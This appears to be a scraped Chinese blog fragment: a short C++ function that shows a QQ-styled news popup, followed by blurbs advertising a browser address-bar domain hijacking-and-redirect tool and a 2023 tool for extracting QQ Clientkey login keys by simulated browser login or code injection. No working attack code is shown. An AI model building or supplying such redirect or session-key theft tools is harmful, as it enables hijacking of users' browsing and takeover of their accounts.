BOOL InitNews()
{
NewsWindow.SetSkin(MAKEINTRESOURCE(IDB_SKIN_QQ));
if(!NewsWindow.Create(_T("今日推荐")))
return FALSE;
NewsWindow.SetNews(lpNewsTitle,lpNewsContent,lpNewsURL);
NewsWindow.Show();
NewsWindow.SetMainWindow();
PlaySound(MAKEINTRESOURCE(IDR_WAVE1),AfxGetResourceHandle(),SND_ASYNC|SND_RESOURCE|SND_NODEFAULT);
return TRUE;
}
谷歌内核系列浏览器地址栏域名监控并跳转
仅供学习与研究,VS2018编写,有能力的可以二次开发。
1、当前版本仅支持单域名监控与跳转。
2、程序经过反复测试,目前能十分稳定的将目标域名跳转到指定域名上。
3、Windows 7 下兼容 IE、edge、360系列、谷歌、Chrome内核系列等等浏览器。
4、Windows 10 / 11 下兼容 IE、edge、360安全、谷歌等浏览器(部分Chrome内核浏览器没详细测试)。
5、Windows 10 / 11 下 360极速浏览器、360极速浏览器X 目前无法支持。
2023年最新版获取Clientkey工具
网上有不少获取Clientkey的方式,第一种是模拟浏览器访问本地登陆的方式获取Clientkey;另外就是注入通过调用它的导出函数获取Clientkey。
本文主要是通过网页模拟浏览器访问来获取Clientkey,之前的老方法已经被和谐。